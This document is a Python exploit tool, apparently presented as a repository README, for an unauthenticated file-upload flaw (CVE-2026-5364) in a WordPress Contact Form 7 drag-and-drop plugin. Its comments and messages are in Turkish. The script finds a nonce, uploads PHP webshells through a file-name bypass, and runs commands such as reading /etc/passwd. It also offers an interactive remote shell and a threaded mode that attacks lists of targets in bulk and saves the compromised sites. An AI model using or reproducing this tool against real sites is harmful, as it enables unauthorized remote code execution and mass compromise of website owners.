README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2026-5364 — Drag and Drop File Upload for Contact Form 7 <= 1.1.3
Unauthenticated Arbitrary File Upload via sanitize_file_name() Bypass
CVSS 8.1 (High)
Researcher: Thomas Sanzey
"""
import requests, argparse, re, sys, time, threading, shutil, json, os
from concurrent.futures import ThreadPoolExecutor, as_completed
from threading import Lock
from urllib.parse import urljoin, urlparse
requests.packages.urllib3.disable_warnings()
# ══════════════════════════════════════════════════
# RENK & ÇIKTI
# ══════════════════════════════════════════════════
def tw():
return shutil.get_terminal_size((100, 24)).columns
class C:
G="\033[92m"; R="\033[91m"; Y="\033[93m"; B="\033[94m"
CY="\033[96m"; MG="\033[35m"; DM="\033[90m"; WH="\033[97m"
BL="\033[1m"; X="\033[0m"
BG_R="\033[41m"; BG_Y="\033[43m"; BG_G="\033[42m"
NOCOLOR = False
@classmethod
def fmt(cls, msg, *codes):
if cls.NOCOLOR: return str(msg)
return "".join(codes) + str(msg) + cls.X
@classmethod
def ok(cls, m): return cls.fmt(m, cls.G)
@classmethod
def err(cls, m): return cls.fmt(m, cls.R)
@classmethod
def warn(cls, m): return cls.fmt(m, cls.Y)
@classmethod
def dim(cls, m): return cls.fmt(m, cls.DM)
@classmethod
def badge_err(cls, m): return cls.fmt(f" {m} ", cls.BG_R, cls.BL, cls.WH)
@classmethod
def badge_warn(cls, m): return cls.fmt(f" {m} ", cls.BG_Y, cls.BL, "\033[30m")
@classmethod
def badge_ok(cls, m): return cls.fmt(f" {m} ", cls.BG_G, cls.BL, cls.WH)
_lock = Lock()
_verbose = False
def out(msg="", end="\n"):
with _lock:
sys.stdout.write("\r" + " " * tw() + "\r" + str(msg) + end)
sys.stdout.flush()
def vout(msg):
if _verbose: out(msg)
def section(title, icon="◆"):
out()
out(C.fmt(f" {icon} ", C.MG, C.BL) + C.fmt(title, C.BL, C.WH))
out(C.fmt(" " + "─" * min(50, tw()-4), C.DM))
def kv(k, v, vc=None):
out(C.fmt(f" · {k:<16}", C.DM) + C.fmt(str(v), vc or C.WH))
# ══════════════════════════════════════════════════
# PROGRESS BAR
# ══════════════════════════════════════════════════
class Bar:
def __init__(self, total, title="", color=None):
self.total = max(total, 1)
self.title = title
self.color = color or C.CY
self.current = 0
self.start = time.time()
self._lines = 0
def update(self, n, info=""):
self.current = n
w = tw()
bw = max(10, w - len(self.title) - 26)
pct = n / self.total
filled = int(bw * pct)
elapsed = time.time() - self.start + 0.001
rate = n / elapsed
eta = (self.total - n) / rate if rate > 0 else 0
bar = (C.fmt("█" * filled, self.color, C.BL) +
C.fmt("░" * (bw - filled), C.DM))
l1 = (C.fmt(f" {self.title} ", C.BL, self.color) +
f" [{bar}] " +
C.fmt(f"{pct*100:5.1f}%", C.BL, C.WH) +
C.fmt(f" ({n}/{self.total})", C.DM))
l2 = (f" " + C.fmt(f"{rate:5.1f}/s", C.G) +
f" ETA " + C.fmt(f"{eta:4.0f}s", C.Y) +
f" " + C.fmt(str(info)[:w-32], C.DM))
with _lock:
if self._lines:
sys.stdout.write(f"\033[{self._lines}A\033[J")
sys.stdout.write(l1 + "\n" + l2 + "\n")
sys.stdout.flush()
self._lines = 2
def finish(self, msg=""):
bw = max(10, tw() - len(self.title) - 26)
elapsed = time.time() - self.start
rate = self.current / (elapsed + 0.001)
with _lock:
if self._lines:
sys.stdout.write(f"\033[{self._lines}A\033[J")
sys.stdout.write(
C.fmt(f" {self.title} ", C.BL, C.G) +
f" [{C.fmt('█'*bw, C.G, C.BL)}] " +
C.fmt("100.0%", C.BL, C.G) +
C.fmt(f" ({self.current}/{self.total})", C.DM) + "\n" +
C.fmt(" ✓ ", C.G, C.BL) +
C.fmt(f"{elapsed:.1f}s {rate:.1f}/s", C.DM) +
(C.fmt(f" {msg}", C.CY) if msg else "") + "\n"
)
sys.stdout.flush()
self._lines = 0
class CounterBar:
def __init__(self, total, title="Scan"):
self.total = max(total, 1)
self.title = title
self.n = 0
self.start = time.time()
def inc(self, info=""):
with _lock:
self.n += 1
elapsed = time.time() - self.start + 0.001
rate = self.n / elapsed
eta = (self.total - self.n) / rate if rate > 0 else 0
line = (C.fmt(f" {self.title} ", C.BL, C.CY) +
C.fmt(f" {self.n/self.total*100:5.1f}%", C.BL, C.WH) +
C.fmt(f" ({self.n}/{self.total})", C.DM) +
C.fmt(f" {rate:.1f}/s", C.G) +
C.fmt(f" ETA {eta:.0f}s", C.Y) +
C.fmt(f" {str(info)[:45]}", C.DM))
sys.stdout.write("\r" + " " * tw() + "\r" + line)
sys.stdout.flush()
def finish(self, msg=""):
elapsed = time.time() - self.start
with _lock:
sys.stdout.write("\r" + " " * tw() + "\r")
sys.stdout.write(
C.fmt(f" {self.title} ", C.BL, C.G) +
C.fmt(" TAMAMLANDI", C.BL, C.G) +
C.fmt(f" ({self.n}/{self.total})", C.DM) +
C.fmt(f" {elapsed:.1f}s", C.DM) +
(C.fmt(f" {msg}", C.CY) if msg else "") + "\n"
)
sys.stdout.flush()
# ══════════════════════════════════════════════════
# BANNER
# ══════════════════════════════════════════════════
def print_banner():
out(C.fmt("""
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██╔════╝
██║ ██║ ██║█████╗ █████╔╝██║██╔██║ █████╔╝███████╗
██║ ╚██╗ ██╔╝██╔══╝ ██╔═══╝ ████╔╝██║██╔═══╝ ██╔═══██╗
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗╚██████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═════╝
""", C.CY, C.BL))
out(C.fmt(" CVE-2026-5364", C.BL, C.R) +
C.fmt(" CF7 Drag & Drop File Upload <= 1.1.3 ", C.DM) +
C.badge_err("CVSS 8.1 HIGH"))
out(C.fmt(" Unauthenticated File Upload via sanitize_file_name() Bypass", C.DM))
out(C.fmt(" " + "─" * (tw()-4), C.DM))
out()
# ══════════════════════════════════════════════════
# HTTP
# ══════════════════════════════════════════════════
def make_session(timeout=15, proxy=None):
s = requests.Session()
s.verify = False
s.timeout = timeout
s.headers.update({
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
"AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/124.0.0.0 Safari/537.36",
})
if proxy:
s.proxies = {"http": proxy, "https": proxy}
return s
def get(sess, url, **kw):
try:
return sess.get(url, allow_redirects=True, **kw)
except Exception as e:
vout(C.dim(f" [GET ERR] {url} → {e}"))
return None
def post_req(sess, url, **kw):
try:
return sess.post(url, allow_redirects=True, **kw)
except Exception as e:
vout(C.dim(f" [POST ERR] {url} → {e}"))
return None
# ══════════════════════════════════════════════════
# PLUGİN TESPİT
# ══════════════════════════════════════════════════
PATCHED = (1, 1, 4)
def parse_version(v):
try:
return tuple(int(x) for x in re.split(r'[.\-]', str(v))[:3])
except Exception:
return (0, 0, 0)
def is_patched(v):
return parse_version(v) >= PATCHED
def detect_plugin(sess, base_url):
result = {
"installed": False,
"version": None,
"patched": False,
"cf7": False,
}
# ── 1) readme.txt ────────────────────────────
readme_url = urljoin(base_url,
"/wp-content/plugins/drag-and-drop-file-upload-for-contact-form-7/readme.txt")
r = get(sess, readme_url)
if r and r.status_code == 200 and "Drag and Drop" in r.text:
result["installed"] = True
m = re.search(r'Stable tag:\s*([\d.]+)', r.text, re.I)
if m:
result["version"] = m.group(1)
result["patched"] = is_patched(m.group(1))
vout(C.dim(f" [detect] readme.txt → v{result['version']}"))
# ── 2) JS dosyası ────────────────────────────
if not result["installed"]:
js_url = urljoin(base_url,
"/wp-content/plugins/drag-and-drop-file-upload-for-contact-form-7"
"/frontend/js/cf7_uploads.js")
r = get(sess, js_url)
if r and r.status_code == 200:
result["installed"] = True
vout(C.dim(" [detect] JS dosyası bulundu"))
# ── 3) HTML sinyalleri ───────────────────────
if not result["installed"]:
r = get(sess, base_url)
if r:
signals = [
r'cf7_file_uploads',
r'drag-and-drop-file-upload-for-contact-form-7',
r'cf7_uploads',
r'dnd_upload',
]
for sig in signals:
if re.search(sig, r.text, re.I):
result["installed"] = True
vout(C.dim(f" [detect] HTML sinyal: {sig}"))
break
# ── CF7 kontrolü ─────────────────────────────
r = get(sess, base_url)
if r and re.search(r'wpcf7|contact-form-7', r.text, re.I):
result["cf7"] = True
return result
# ══════════════════════════════════════════════════
# NONCE ÇIKAR
# ══════════════════════════════════════════════════
def extract_nonce(sess, base_url):
candidates = [
base_url,
urljoin(base_url, "/contact/"),
urljoin(base_url, "/contact-us/"),
urljoin(base_url, "/iletisim/"),
urljoin(base_url, "/?page_id=2"),
urljoin(base_url, "/?p=1"),
]
# REST API'den sayfa listesi
api = urljoin(base_url, "/wp-json/wp/v2/pages?per_page=20&_fields=link")
r = get(sess, api)
if r and r.status_code == 200:
try:
for p in r.json():
link = p.get("link", "")
if link and link not in candidates:
candidates.append(link)
except Exception:
pass
nonce_patterns = [
r'"nonce"\s*:\s*"([a-f0-9]{10})"',
r"'nonce'\s*:\s*'([a-f0-9]{10})'",
r'cf7_file_uploads.*?"nonce"\s*:\s*"([a-f0-9]+)"',
r'nonce["\s:\']+([a-f0-9]{8,12})',
]
for url in candidates:
r = get(sess, url)
if not r or r.status_code != 200:
continue
for pat in nonce_patterns:
m = re.search(pat, r.text, re.S)
if m:
nonce = m.group(1)
vout(C.dim(f" [nonce] {url} → {nonce}"))
return nonce, url
return None, None
# ══════════════════════════════════════════════════
# WEBSHELL İÇERİKLERİ
# ══════════════════════════════════════════════════
SHELLS = {
"basic": '<?php system($_GET["cmd"]); ?>',
"exec": '<?php echo shell_exec($_GET["cmd"]); ?>',
"pass": '<?php passthru($_GET["cmd"]); ?>',
"eval": '<?php @eval(base64_decode($_POST["x"])); ?>',
"info": '<?php phpinfo(); ?>',
}
def get_shell_content(shell_type="basic"):
return SHELLS.get(shell_type, SHELLS["basic"])
# ══════════════════════════════════════════════════
# SHELL URL DOĞRULA
# ══════════════════════════════════════════════════
def is_valid_shell_url(url, base_url):
"""
Dönen URL gerçekten upload dizininde bir PHP dosyası mı?
"""
if not url or not isinstance(url, str):
return False
# http ile başlamalı
if not url.startswith("http"):
return False
parsed = urlparse(url)
# .php uzantılı olmalı
if not parsed.path.lower().endswith(".php"):
return False
# uploads dizininde olmalı
if "uploads" not in parsed.path:
return False
# Bilinen WP sistem dosyaları olmamalı
BLOCKED_PATHS = [
"xmlrpc.php", "wp-login.php", "wp-cron.php",
"wp-trackback.php", "wp-comments-post.php",
"wp-signup.php", "wp-activate.php",
]
path_lower = parsed.path.lower()
for bp in BLOCKED_PATHS:
if path_lower.endswith(bp):
vout(C.dim(f" [url_check] Engellendi: {bp}"))
return False
# wp-admin içinde olmamalı
if "wp-admin" in path_lower:
return False
return True
# ══════════════════════════════════════════════════
# DOSYA YÜKLE
# ══════════════════════════════════════════════════
def upload_shell(sess, base_url, nonce, shell_content, shell_type="basic"):
"""
CVE-2026-5364 exploit:
- Dosya adı : shell.php$ → sanitize_file_name() → .php olarak kaydedilir
- type param: php$ → blacklist'te yok, allowlist'te var
- Sonuç : wp-content/uploads/cf7-uploads-custom/<uniqid>.php
"""
ajax_url = urljoin(base_url, "/wp-admin/admin-ajax.php")
# sanitize_file_name() tarafından silinen bypass karakterleri
bypass_chars = ["$", "%", "~", "`", " "]
for bchar in bypass_chars:
filename = f"shell.php{bchar}"
ext_bypass = f"php{bchar}"
shell_bytes = shell_content.encode()
files = {
"file": (
filename,
shell_bytes,
"application/x-php",
)
}
data = {
"action": "cf7_file_uploads",
"nonce": nonce,
"type": ext_bypass,
"size": str(len(shell_bytes)),
"type_upload": "0",
}
vout(C.dim(f" [upload] bypass='{bchar}' "
f"file={filename} type={ext_bypass}"))
r = post_req(sess, ajax_url, data=data, files=files)
if not r:
continue
vout(C.dim(f" [response] {r.status_code} → {r.text[:200]}"))
# ── JSON parse ───────────────────────────
try:
resp = r.json()
if resp.get("status") == "ok":
file_url = resp.get("text", "")
# URL doğrulama — xmlrpc.php gibi sahte URL'leri filtrele
if is_valid_shell_url(file_url, base_url):
return {
"ok": True,
"url": file_url,
"bchar": bchar,
"filename": filename,
"raw": resp,
}
else:
vout(C.dim(f" [upload] Geçersiz shell URL: {file_url}"))
continue
# Reddedildi — sonraki bypass dene
if resp.get("status") == "not":
vout(C.dim(f" [upload] '{bchar}' reddedildi"))
continue
except Exception:
# JSON değil — regex ile URL ara
m = re.search(r'https?://[^\s"\'<>]+\.php', r.text)
if m:
file_url = m.group(0)
if is_valid_shell_url(file_url, base_url):
return {
"ok": True,
"url": file_url,
"bchar": bchar,
"filename": filename,
"raw": r.text,
}
return {"ok": False, "reason": "all_bypass_failed"}
# ══════════════════════════════════════════════════
# SHELL DOĞRULA & KOMUT ÇALIŞTIR
# ══════════════════════════════════════════════════
# Komuta özel kesin RCE kalıpları
RCE_PATTERNS = {
"id": r'uid=\d+\([^)]+\)\s+gid=\d+\([^)]+\)',
"whoami": r'^(?:www-data|root|apache|nginx|nobody|http|daemon|ftp)$',
"uname -a": r'Linux\s+\S+\s+\d+\.\d+\.\d+',
"uname": r'(?:Linux|Darwin|FreeBSD)\s+\S+',
"pwd": r'^/(?:var|home|srv|www|opt|tmp|usr)[/\w.\-]+$',
"hostname": r'^[a-zA-Z0-9][a-zA-Z0-9\-]{2,62}$',
"cat /etc/passwd": r'root:x:0:0:root',
"ls": r'(?:total \d+|[-drwx]{10}\s+\d+)',
"ls -la": r'(?:total \d+|[-drwx]{10}\s+\d+)',
"ps": r'(?:PID\s+TTY|^\s*\d+\s+pts)',
"ps aux": r'(?:USER\s+PID|root\s+\d+)',
"ifconfig": r'inet\s+\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}',
"ip a": r'inet\s+\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}',
"df": r'/dev/[a-z]+\d*\s+\d+',
"df -h": r'/dev/[a-z]+\d*\s+\d+',
"env": r'(?:^|\n)(?:PATH|HOME|USER|SHELL)=',
"phpinfo": r'PHP Version \d+\.\d+\.\d+',
}
# Kesinlikle false positive olan içerikler
FALSE_POSITIVES = [
r'XML-RPC',
r'xmlrpc',
r'POST requests only',
r'WordPress.*?site',
r'wp-login',
r'Error\s+40[34]',
r'Not Found',
r'Forbidden',
r'Access Denied',
r'Object not found',
r'You are not authorized',
r'<!DOCTYPE html',
r'<html',
]
def verify_shell(sess, shell_url, cmd="id"):
"""
Yüklenen shell'i doğrula — komut çıktısını al.
Sahte pozitif koruması aktif.
"""
# ── Shell URL ön kontrolü ─────────────────────
if not is_valid_shell_url(shell_url, ""):
return {"ok": False, "reason": "invalid_shell_url"}
r = get(sess, f"{shell_url}?cmd={requests.utils.quote(cmd)}")
if not r:
return None
text = r.text.strip()
# ── HTTP durum kontrolleri ────────────────────
if r.headers.get("Content-Disposition", "").startswith("attachment"):
return {"blocked": True, "reason": "htaccess_attachment"}
if r.status_code == 403:
return {"blocked": True, "reason": "403_forbidden"}
if r.status_code == 404:
return {"blocked": True, "reason": "404_not_found"}
if r.status_code == 500:
return {"ok": False, "reason": "500_server_error"}
# ── HTML temizle ──────────────────────────────
clean = re.sub(r'<[^>]+>', '', text)
clean = re.sub(r'&[a-z]+;', ' ', clean)
clean = re.sub(r'\s+', ' ', clean).strip()
# ── False positive kontrolü ───────────────────
for fp in FALSE_POSITIVES:
if re.search(fp, clean, re.I):
vout(C.dim(f" [verify] False positive: {fp}"))
return {"ok": False, "reason": f"false_positive"}
# ── Komuta özel RCE pattern ───────────────────
pat = RCE_PATTERNS.get(
cmd.strip().lower(),
RCE_PATTERNS["id"] # bilinmeyen komutlar için id pattern
)
m = re.search(pat, clean, re.MULTILINE)
if m:
return {
"ok": True,
"output": clean[:500],
"match": m.group(0),
}
# ── PHP hata mesajı ───────────────────────────
if re.search(r'(?:Warning|Fatal error|Parse error).*PHP', text, re.I):
return {"ok": False, "reason": "php_error", "raw": text[:200]}
# ── Boş yanıt ────────────────────────────────
if len(clean) < 3:
return {"ok": False, "reason": "empty_response"}
return {"ok": False, "reason": "no_rce_pattern", "raw": clean[:150]}
# ══════════════════════════════════════════════════
# ANA EXPLOIT (tek hedef)
# ══════════════════════════════════════════════════
def exploit_single(sess, base_url, cmd="id", shell_type="basic",
silent=False, timeout=12, skip_patched=True):
url = base_url.rstrip("/")
if not url.startswith("http"):
url = "http://" + url
# ── 1) Plugin tespit ──────────────────────────
plugin = detect_plugin(sess, url)
if not silent:
section("Plugin Tespit", "①")
kv("CF7 D&D Upload",
C.ok("✓ Kurulu") if plugin["installed"] else C.err("✗ Bulunamadı"))
if plugin["version"]:
kv("Sürüm", plugin["version"],
C.R if not plugin["patched"] else C.G)
kv("Durum",
C.badge_err("ZAFİYETLİ") if not plugin["patched"]
else C.badge_ok("YAMALI"))
kv("CF7 Plugin",
C.ok("✓ Var") if plugin["cf7"] else C.warn("? Belirsiz"))
if not plugin["installed"]:
return {"ok": False, "reason": "plugin_not_found", "url": url}
if skip_patched and plugin["patched"]:
if not silent:
out(C.warn(f"\n ⊘ Yamalı sürüm — atlanıyor "
f"(v{plugin['version']} >= 1.1.4)"))
return {
"ok": False, "reason": "patched",
"version": plugin["version"],
"skipped": True, "url": url,
}
# ── 2) Nonce çıkar ────────────────────────────
if not silent:
section("Nonce Tespiti", "②")
nonce, nonce_page = extract_nonce(sess, url)
if not silent:
if nonce:
kv("Nonce", nonce, C.G)
kv("Kaynak", nonce_page, C.DM)
else:
out(C.err(" ✗ Nonce bulunamadı"))
if not nonce:
return {
"ok": False, "reason": "nonce_not_found",
"version": plugin.get("version"), "url": url,
}
# ── 3) Shell yükle ────────────────────────────
if not silent:
section("Shell Yükleme", "③")
kv("Shell Tipi", shell_type)
kv("Payload", SHELLS.get(shell_type, SHELLS["basic"])[:50] + "...", C.DM)
kv("Teknik", "shell.php$ → sanitize → shell.php", C.Y)
out()
shell_content = get_shell_content(shell_type)
bar = None
if not silent:
bar = Bar(len(["$", "%", "~", "`", " "]), "Upload", C.CY)
upload = upload_shell(sess, url, nonce, shell_content, shell_type)
if bar:
bar.finish(C.ok("BAŞARILI") if upload["ok"] else C.err("Başarısız"))
if not upload["ok"]:
if not silent:
out(C.err(f"\n ✗ Shell yüklenemedi: {upload.get('reason','')}"))
return {
"ok": False, "reason": "upload_failed",
"version": plugin.get("version"), "url": url,
}
shell_url = upload["url"]
if not silent:
out()
kv("Shell URL", shell_url, C.G)
kv("Bypass Char", upload["bchar"], C.Y)
kv("Dosya Adı", upload["filename"], C.DM)
# ── 4) Shell doğrula ──────────────────────────
if not silent:
section("Shell Doğrulama", "④")
kv("Komut", cmd, C.CY)
out()
time.sleep(1)
verify = verify_shell(sess, shell_url, cmd)
if not verify:
return {
"ok": False, "reason": "verify_request_failed",
"shell_url": shell_url, "url": url,
}
if verify.get("blocked"):
reason = verify.get("reason", "")
if not silent:
out(C.warn("\n ⚠ Shell yüklendi ama çalıştırılamadı"))
kv("Sebep", reason, C.DM)
if "htaccess" in reason:
out(C.dim(" · Apache .htaccess engeli aktif"))
out(C.dim(" · Nginx/LiteSpeed sunucularında bu engel yoktur"))
return {
"ok": False, "reason": reason,
"shell_url": shell_url, "uploaded": True,
"version": plugin.get("version"), "url": url,
}
if verify.get("ok"):
output = verify.get("output", "")
if not silent:
out(C.fmt(" ┌─ RCE ÇIKTISI ", C.G, C.BL) +
C.fmt("─" * 35, C.G))
for line in output.splitlines()[:10]:
out(C.fmt(" │ ", C.G) + C.fmt(line, C.WH, C.BL))
out(C.fmt(" └" + "─" * 45, C.G))
out()
kv("Shell URL", shell_url, C.G)
kv("Kullanım",
f'curl "{shell_url}?cmd=whoami"', C.CY)
return {
"ok": True,
"output": output,
"shell_url": shell_url,
"url": url,
"version": plugin.get("version"),
"bchar": upload["bchar"],
"cmd": cmd,
"nonce": nonce,
}
if not silent:
out(C.warn(" ⚠ Shell yüklendi — komut çıktısı alınamadı"))
out(C.dim(f" · Ham yanıt: {verify.get('raw','')[:150]}"))
kv("Shell URL", shell_url, C.Y)
return {
"ok": False, "reason": "no_rce_output",
"shell_url": shell_url, "uploaded": True,
"version": plugin.get("version"), "url": url,
}
# ══════════════════════════════════════════════════
# TOPLU TARAMA
# ══════════════════════════════════════════════════
def bulk_scan(targets, cmd="id", shell_type="basic", threads=10,
skip_patched=True, timeout=12, proxy=None):
total = len(targets)
results = []
uploaded = []
bar = CounterBar(total, "Tarama")
r_lock = Lock()
def worker(target):
url = target.strip()
if not url:
return
if not url.startswith("http"):
url = "http://" + url
sess = make_session(timeout=timeout, proxy=proxy)
res = exploit_single(
sess, url,
cmd = cmd,
shell_type = shell_type,
silent = True,
timeout = timeout,
skip_patched = skip_patched,
)
if res.get("ok"):
tag = C.ok(f"✓ RCE {url}")
with r_lock:
results.append(res)
out(C.fmt("\n " + "═" * 62, C.G))
out(C.ok(f" ✓ RCE ALINDI → {url}"))
out(C.fmt(f" · Sürüm : {res.get('version','?')}", C.DM))
out(C.fmt(f" · Shell URL : {res.get('shell_url','')}", C.CY))
out(C.fmt(f" · Çıktı : "
f"{res.get('output','')[:100]}", C.WH))
out(C.fmt(" " + "═" * 62 + "\n", C.G))
elif res.get("uploaded"):
tag = C.warn(f"⬆ yüklendi (RCE yok) {url}")
with r_lock:
uploaded.append(res)
out(C.fmt(f"\n ⚠ Shell yüklendi ama çalışmadı → {url}", C.Y))
out(C.fmt(f" · Shell URL : {res.get('shell_url','')}", C.CY))
out(C.fmt(f" · Sebep : {res.get('reason','')}\n", C.DM))
elif res.get("skipped"):
tag = C.dim(f"⊘ yamalı {url}")
elif res.get("reason") == "plugin_not_found":
tag = C.dim(f"– plugin yok {url}")
elif res.get("reason") == "nonce_not_found":
tag = C.warn(f"? nonce yok {url}")
else:
tag = C.err(f"✗ başarısız {url}")
bar.inc(tag)
with ThreadPoolExecutor(max_workers=threads) as ex:
futs = {ex.submit(worker, t): t for t in targets}
try:
for f in as_completed(futs):
f.result()
except KeyboardInterrupt:
out(C.warn("\n [!] Kullanıcı durdurdu."))
bar.finish(f"{len(results)} RCE | {len(uploaded)} yüklendi")
return results, uploaded
# ══════════════════════════════════════════════════
# KAYDET
# ══════════════════════════════════════════════════
def save_results(results, uploaded=None, outfile=None):
if not results and not uploaded:
return
if not outfile:
outfile = f"cf7_upload_{int(time.time())}.txt"
lines = []
lines.append("=" * 60)
lines.append("CVE-2026-5364 — CF7 Drag & Drop File Upload RCE")
lines.append(f"Tarih: {time.strftime('%Y-%m-%d %H:%M:%S')}")
lines.append("=" * 60)
lines.append("")
if results:
lines.append(f"[+] RCE ALINAN HEDEFLER ({len(results)})")
lines.append("-" * 40)
for r in results:
lines.append(f"URL : {r.get('url','')}")
lines.append(f"Sürüm : {r.get('version','?')}")
lines.append(f"Shell URL : {r.get('shell_url','')}")
lines.append(f"Komut : {r.get('cmd','')}")
lines.append(f"Çıktı : {r.get('output','')[:300]}")
lines.append(f"Bypass : {r.get('bchar','')}")
lines.append(f"Nonce : {r.get('nonce','')}")
lines.append("")
if uploaded:
lines.append(f"[~] SHELL YÜKLENDİ AMA RCE YOK ({len(uploaded)})")
lines.append("-" * 40)
for r in uploaded:
lines.append(f"URL : {r.get('url','')}")
lines.append(f"Sürüm : {r.get('version','?')}")
lines.append(f"Shell URL : {r.get('shell_url','')}")
lines.append(f"Sebep : {r.get('reason','')}")
lines.append("")
try:
with open(outfile, "w", encoding="utf-8") as f:
f.write("\n".join(lines))
out(C.ok(f"\n ✓ Sonuçlar kaydedildi → {outfile}"))
except Exception as e:
out(C.err(f" ✗ Kayıt hatası: {e}"))
# ══════════════════════════════════════════════════
# İNTERAKTİF SHELL
# ══════════════════════════════════════════════════
def interactive_shell(sess, shell_url):
out()
out(C.fmt(" ╔══════════════════════════════════════════╗", C.G, C.BL))
out(C.fmt(" ║ İnteraktif Shell Açıldı ║", C.G, C.BL))
out(C.fmt(" ║ Çıkmak için: exit / quit / Ctrl+C ║", C.G, C.BL))
out(C.fmt(" ╚══════════════════════════════════════════╝", C.G, C.BL))
out()
for init_cmd in ["id", "uname -a", "pwd"]:
r = verify_shell(sess, shell_url, init_cmd)
if r and r.get("ok"):
first_line = (r.get("output","") or "").splitlines()
kv(init_cmd, first_line[0] if first_line else "", C.CY)
out()
history = []
while True:
try:
prompt = (C.fmt(" webshell", C.G, C.BL) +
C.fmt("@", C.DM) +
C.fmt("cf7", C.R, C.BL) +
C.fmt(" $ ", C.WH, C.BL))
cmd = input(prompt).strip()
except (KeyboardInterrupt, EOFError):
out(C.warn("\n [!] Shell kapatıldı."))
break
if not cmd:
continue
if cmd.lower() in ("exit", "quit", "q"):
out(C.dim(" [*] Çıkılıyor..."))
break
if cmd.lower() == "history":
for i, h in enumerate(history, 1):
out(C.dim(f" {i:3} {h}"))
continue
if cmd.lower() == "help":
out(C.dim(" Komutlar: exit, quit, history, help"))
out(C.dim(" Herhangi bir OS komutu çalıştırabilirsiniz."))
continue
history.append(cmd)
r = get(sess, f"{shell_url}?cmd={requests.utils.quote(cmd)}")
if not r:
out(C.err(" ✗ İstek başarısız"))
continue
if r.headers.get("Content-Disposition","").startswith("attachment"):
out(C.err(" ✗ .htaccess engeli — PHP çalıştırılamıyor"))
continue
# False positive kontrolü
is_fp = False
for fp in FALSE_POSITIVES:
if re.search(fp, r.text, re.I):
out(C.err(f" ✗ Geçersiz yanıt (false positive: {fp})"))
is_fp = True
break
if is_fp:
continue
output = re.sub(r'<[^>]+>', '', r.text).strip()
if output:
for line in output.splitlines():
out(C.fmt(" │ ", C.G) + line)
else:
out(C.dim(" (boş çıktı)"))
# ══════════════════════════════════════════════════
# ARG PARSER
# ══════════════════════════════════════════════════
def build_parser():
p = argparse.ArgumentParser(
prog="CVE-2026-5364",
description=(
"CF7 Drag & Drop File Upload <= 1.1.3\n"
"Unauthenticated Arbitrary File Upload "
"via sanitize_file_name() Bypass"
),
formatter_class=argparse.RawTextHelpFormatter,
epilog="""
Örnekler:
Tek hedef:
python CVE-2026-5364.py -u https://target.com
python CVE-2026-5364.py -u https://target.com -c "whoami" --shell exec
python CVE-2026-5364.py -u https://target.com --interactive
Toplu tarama:
python CVE-2026-5364.py -l targets.txt -t 20 -o results.txt
python CVE-2026-5364.py -l targets.txt --no-skip-patched -t 30
""",
)
g1 = p.add_argument_group("Hedef")
mx = g1.add_mutually_exclusive_group(required=True)
mx.add_argument("-u", "--url", metavar="URL", help="Tek hedef URL")
mx.add_argument("-l", "--list", metavar="FILE", help="Hedef listesi")
g2 = p.add_argument_group("Exploit")
g2.add_argument("-c", "--cmd",
default="id", metavar="CMD",
help="Çalıştırılacak OS komutu (varsayılan: id)")
g2.add_argument("--shell",
default="basic",
choices=["basic","exec","pass","eval","info"],
metavar="TYPE",
help="Webshell tipi: basic|exec|pass|eval|info")
g2.add_argument("--interactive", "-i",
action="store_true",
help="Başarılı exploit sonrası interaktif shell aç")
g2.add_argument("--no-skip-patched",
dest="skip_patched",
action="store_false", default=True,
help="Yamalı sürümleri de dene")
g3 = p.add_argument_group("Tarama")
g3.add_argument("-t", "--threads",
type=int, default=10, metavar="N",
help="Thread sayısı (varsayılan: 10)")
g3.add_argument("--timeout",
type=int, default=15, metavar="S",
help="Timeout saniye (varsayılan: 15)")
g3.add_argument("--proxy",
metavar="URL",
help="Proxy (örn: http://127.0.0.1:8080)")
g4 = p.add_argument_group("Çıktı")
g4.add_argument("-o", "--output",
metavar="FILE",
help="Sonuç dosyası")
g4.add_argument("-v", "--verbose",
action="store_true",
help="Ayrıntılı çıktı")
g4.add_argument("--no-color",
action="store_true",
help="Renksiz çıktı")
return p
# ══════════════════════════════════════════════════
# MAIN
# ══════════════════════════════════════════════════
def main():
global _verbose
parser = build_parser()
args = parser.parse_args()
if args.no_color:
C.NOCOLOR = True
if args.verbose:
_verbose = True
print_banner()
# ── Toplu tarama ──────────────────────────────
if args.list:
try:
with open(args.list, encoding="utf-8") as f:
targets = [l.strip() for l in f if l.strip()]
except FileNotFoundError:
out(C.err(f" ✗ Dosya bulunamadı: {args.list}"))
sys.exit(1)
section("Toplu Tarama", "▶")
kv("Liste", args.list, C.DM)
kv("Hedef", len(targets), C.WH)
kv("Thread", args.threads, C.DM)
kv("Komut", args.cmd, C.CY)
kv("Shell", args.shell, C.DM)
kv("Yamalı", "Atla" if args.skip_patched else "Dene", C.DM)
out()
results, uploaded = bulk_scan(
targets,
cmd = args.cmd,
shell_type = args.shell,
threads = args.threads,
skip_patched = args.skip_patched,
timeout = args.timeout,
proxy = args.proxy,
)
save_results(results, uploaded, args.output)
out()
out(C.fmt(" ╔══ ÖZET ═══════════════════════════════╗", C.G, C.BL))
out(C.fmt(f" ║ Toplam Hedef : {len(targets):<21}║", C.WH))
out(C.fmt(f" ║ RCE Alınan : {len(results):<21}║", C.G))
out(C.fmt(f" ║ Shell Yüklendi: {len(uploaded):<21}║", C.Y))
out(C.fmt(" ╠═══════════════════════════════════════╣", C.G, C.BL))
for r in results:
out(C.fmt(f" ║ ✓ {r['url'][:36]:<36}║", C.G))
out(C.fmt(" ╚═══════════════════════════════════════╝", C.G, C.BL))
return
# ── Tek hedef ─────────────────────────────────
url = args.url.rstrip("/")
if not url.startswith("http"):
url = "http://" + url
section("Hedef Bilgileri", "▶")
kv("URL", url, C.CY)
kv("Komut", args.cmd, C.DM)
kv("Shell", args.shell, C.DM)
out()
sess = make_session(timeout=args.timeout, proxy=args.proxy)
result = exploit_single(
sess, url,
cmd = args.cmd,
shell_type = args.shell,
silent = False,
timeout = args.timeout,
skip_patched = args.skip_patched,
)
if result.get("ok"):
save_results([result], outfile=args.output)
